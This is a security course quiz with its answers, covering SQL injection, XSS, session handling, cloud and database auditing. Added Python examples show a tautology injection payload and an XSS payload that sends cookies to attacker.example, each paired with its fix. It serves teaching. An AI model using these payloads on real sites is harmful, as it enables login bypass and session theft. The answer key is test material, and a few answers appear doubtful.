cct250 ch09 quiz
Which of the following statements is NOT true regarding Structured Query Language (SQL) injections?
They are specific to only one vendor's database and cannot force the application to reveal restricted information.
Input validation refers to restricting the type of input or data the website will accept so that mistakes will not be entered into the system.
True
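The two questions above (what an injection can force out of an application, and what input validation is) are easiest to see side by side in code. The following is an added example written for this page, not code from the quiz or its textbook; the table layout, the account data, the tautology payload and the username allow-list pattern are all constructed for the demonstration. It uses Python's bundled sqlite3 driver so it runs offline, but the same concatenation bug and the same parameterized fix apply to any SQL engine.

```python
import re
import sqlite3

# Constructed demo database for this example (not from the quiz or its textbook).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn

def login_vulnerable(conn, username, password):
    # Vulnerable: untrusted input is spliced into the SQL text, so a quote in the
    # username changes the structure of the query instead of being treated as data.
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()

def login_parameterized(conn, username, password):
    # Fixed: the query text is constant; values are bound by the driver and can
    # never be interpreted as SQL syntax, whatever characters they contain.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

# Allow-list pattern (assumed policy): lowercase letters, digits, underscore, 3-32 chars.
USERNAME_RE = re.compile(r"[a-z0-9_]{3,32}")

def valid_username(username):
    # Input validation: reject anything that is not shaped like a username
    # before it reaches the database at all.
    return USERNAME_RE.fullmatch(username) is not None

def login(conn, username, password):
    # Defence in depth: validate first, then run the parameterized query.
    if not valid_username(username):
        return []
    return login_parameterized(conn, username, password)

# Classic tautology payload (constructed): closes the username literal, adds an
# always-true condition, and comments out the password check.
PAYLOAD = "' OR '1'='1' --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", login_vulnerable(db, PAYLOAD, "wrong"))      # every row leaks
    print("parameterized:", login_parameterized(db, PAYLOAD, "wrong"))   # []
    print("validated:    ", login(db, PAYLOAD, "wrong"), valid_username(PAYLOAD))
```

The vulnerable function returns every user and role for a password the attacker never knew, which is exactly the "reveal restricted information" outcome the first question refers to. Note that validation alone is not the fix: the allow-list blocks this payload, but the parameterized query is what removes the vulnerability class, because it works for fields (free text, passwords) where no tight allow-list is possible.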
Which of the following statements is NOT true regarding the protection of databases?
Very few tools are available to locate, audit, and ultimately protect databases.
Which of the following refers to encryption using short keys or keys that are poorly designed and implemented that can allow an attacker to decrypt data easily and gain unauthorized access to the information?
Weak ciphers or encoding algorithms
Hunter collected the following banner information from a web server in his environment. What type of information can he determine solely by analyzing this banner?
Web server version
Typical categories of databases include all of the following EXCEPT
applied database.
Offloading services from the local intranet to the Internet itself can be done by using:
cloud computing
Security issues that can arise in cloud computing that are above and beyond those with standard environments include all of the following EXCEPT:
detectability.
The categories of Web application vulnerabilities include all of the following EXCEPT:
end-user education.
Web applications that require a user to log on prior to gaining access can track information relating to improper or incorrect logons; this information typically lists entries such as all of the following EXCEPT:
entry of a valid user ID and password.
Browsers do not display:
hidden fields.
Exploitative behaviors against Web applications include all of the following EXCEPT:
man-in-the-middle attacks
Common database vulnerabilities include all of the following EXCEPT:
strong audit log settings.
NGSSQuirreL and AppDetective are:
pieces of software for performing audits on databases
Which of the following challenges can be solved by firewalls?
protection against scanning
NCC SQuirreL and AppDetectivePro are ________.
software tools for performing audits on databases
Common database vulnerabilities include all of the following EXCEPT:
strong audit log settings.
SQLPing and SQLRecon are:
tools for locating rogue or unknown database installations.
-- are scripting languages. (Select two)
JavaScript and PHP
Web applications are used to
Allow dynamic content
Common forms of distributed denial of service (DDoS) attacks include all of the following EXCEPT:
Buffer overflows
What type of attack relies on a variation of the input validation attack but has the goal of going after a user instead of the application or data?
Cross-site scripting (XSS)
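The question above says XSS is an input-validation problem aimed at the user rather than the data. The following added example (written for this page, not code from the quiz or its textbook) shows the reflected form: a search page echoes the term back into HTML. It compares the vulnerable template, a blacklist "fix" that strips only the script tag, and the real fix, contextual output encoding. Python is used to match the other examples on this page; the two payloads, the `attacker.example` host and the page template are constructed for the demo.

```python
import html
import re

# Constructed payloads for the demo (not from the quiz or its textbook).
SCRIPT_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
EVENT_PAYLOAD = '<img src=x onerror="alert(document.cookie)">'

def render_vulnerable(term):
    # Reflected XSS: the search term is written into the HTML body verbatim,
    # so markup supplied by the attacker becomes part of the page served to the victim.
    return f"<p>Results for: {term}</p>"

def render_blacklist(term):
    # A common half-fix: strip the one tag the developer thought of.
    cleaned = re.sub(r"</?script[^>]*>", "", term, flags=re.IGNORECASE)
    return f"<p>Results for: {cleaned}</p>"

def render_escaped(term):
    # Correct fix for an HTML element body: encode the characters that can
    # start markup (< > & " ') so the browser renders the payload as text.
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"

def reflects_markup(render, payload):
    # True if the attacker's payload survives into the output unchanged.
    return payload in render(payload)

def injected_tags(page):
    # Tag names in the rendered page other than the template's own <p>,
    # i.e. markup that came from user input.
    return [t for t in re.findall(r"<\s*/?\s*([a-zA-Z]+)", page) if t.lower() != "p"]

if __name__ == "__main__":
    renderers = [
        ("vulnerable", render_vulnerable),
        ("blacklist", render_blacklist),
        ("escaped", render_escaped),
    ]
    for name, render in renderers:
        for payload in (SCRIPT_PAYLOAD, EVENT_PAYLOAD):
            print(f"{name:10} -> injected tags: {injected_tags(render(payload))}")
```

The blacklist version stops the script tag but lets the event-handler payload straight through, which is why a denylist of "bad" input is not a fix for XSS. Escaping at the point of output is context-specific: `html.escape` is right for element bodies and quoted attribute values, but a value placed inside a URL, a JavaScript string or a CSS block needs that context's encoder instead.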
Which of the following is a hierarchical, structured format for storing information for later retrieval, modification, management, and other purposes?
Database
Which category of risk inherent with Web servers includes risks such as the ability to steal information from a server, run scripts or executables remotely, enumerate servers, and carry out denial of service (DoS) attacks?
Defects and misconfiguration risks
Which class of individuals works the most with the server and is primarily concerned with access to content and services?
End user
A denial of service (DoS) attack is considered a critical problem because it is very difficult to defeat.
False
A distributed denial of service (DDoS) attack is mostly an annoyance; however, a denial of service (DoS) attack is much more of a problem.
False
Databases can be a victim of source code exploits.
False
Input validation is a result of SQL injections.
False
The stability of a web server does not depend on the operating system.
False
Which web session vulnerability is directly associated with sessions that remain valid for periods longer than they are needed?
Long-lived sessions
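The fix for the long-lived session vulnerability named above is to bound every session twice: an idle timeout that expires it after inactivity and an absolute timeout that caps its total life, with server-side invalidation on logout and a fresh identifier after login. The following added example (written for this page, not code from the quiz or its textbook) implements that in a small in-memory session store. The 15-minute and 8-hour limits are assumed policy values, and the injectable clock exists only so the expiry paths can be exercised without waiting.

```python
import secrets
import time

# Assumed policy values for this example (not from the quiz or its textbook).
IDLE_TIMEOUT = 15 * 60          # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 60 * 60  # hard cap on lifetime, however active the user is

class ManualClock:
    # Test clock so the example can step through hours instantly.
    def __init__(self, start=1_700_000_000.0):
        self.now = start
    def __call__(self):
        return self.now
    def advance(self, seconds):
        self.now += seconds

class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}

    def create(self, user):
        # 256-bit random identifier from the OS CSPRNG; never derived from user data or time.
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def lookup(self, sid):
        # Returns the user for a live session, or None. Expired entries are purged
        # on access so a stale cookie can never be replayed later.
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if now - s["created"] > ABSOLUTE_TIMEOUT or now - s["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def rotate(self, sid):
        # Issue a fresh identifier after login or a privilege change (defeats session
        # fixation); the old identifier stops working immediately. None if sid is dead.
        if self.lookup(sid) is None:
            return None
        s = self._sessions.pop(sid)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = s
        return new_sid

    def logout(self, sid):
        # Server-side invalidation: clearing the browser cookie alone would leave it live.
        return self._sessions.pop(sid, None) is not None

def keepalive_lookups(store, clock, sid, step, attempts):
    # Poll the session every `step` seconds and count how many polls succeed
    # before the absolute timeout ends it despite constant activity.
    ok = 0
    for _ in range(attempts):
        clock.advance(step)
        if store.lookup(sid) is None:
            break
        ok += 1
    return ok

if __name__ == "__main__":
    clock = ManualClock()
    store = SessionStore(clock=clock)
    sid = store.create("alice")
    clock.advance(IDLE_TIMEOUT + 1)
    print("after idle timeout:", store.lookup(sid))                                  # None
    sid = store.create("alice")
    print("10-minute polls before absolute cap:", keepalive_lookups(store, clock, sid, 600, 100))  # 48
```

Without the absolute timeout, an attacker who captured one session cookie and touched it every few minutes would hold the account indefinitely; the idle timeout alone does not close that hole. Rotating the identifier on login means a value planted in the victim's browser before authentication is worthless afterwards.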
-- is used to audit databases.
NCC SQuirreL
Which of the following is the best choice for storing and retrieving massive volumes of data in extremely short periods of time?
NoSQL database
Which cloud computing service model provides a virtual infrastructure and some preinstalled software components?
PaaS
Which of the following is NOT considered a vulnerability of Web servers?
Poor end-user training
-- can be caused by the exploitation of defects and code.
SQL injection
Which class of individuals is primarily concerned with the security of the Web server because it can provide an easy means of getting into the local network?
Server administrator
Which of the following refers to a language used to interact with databases, making it possible to access, manipulate, and change data?
Structured Query Language (SQL)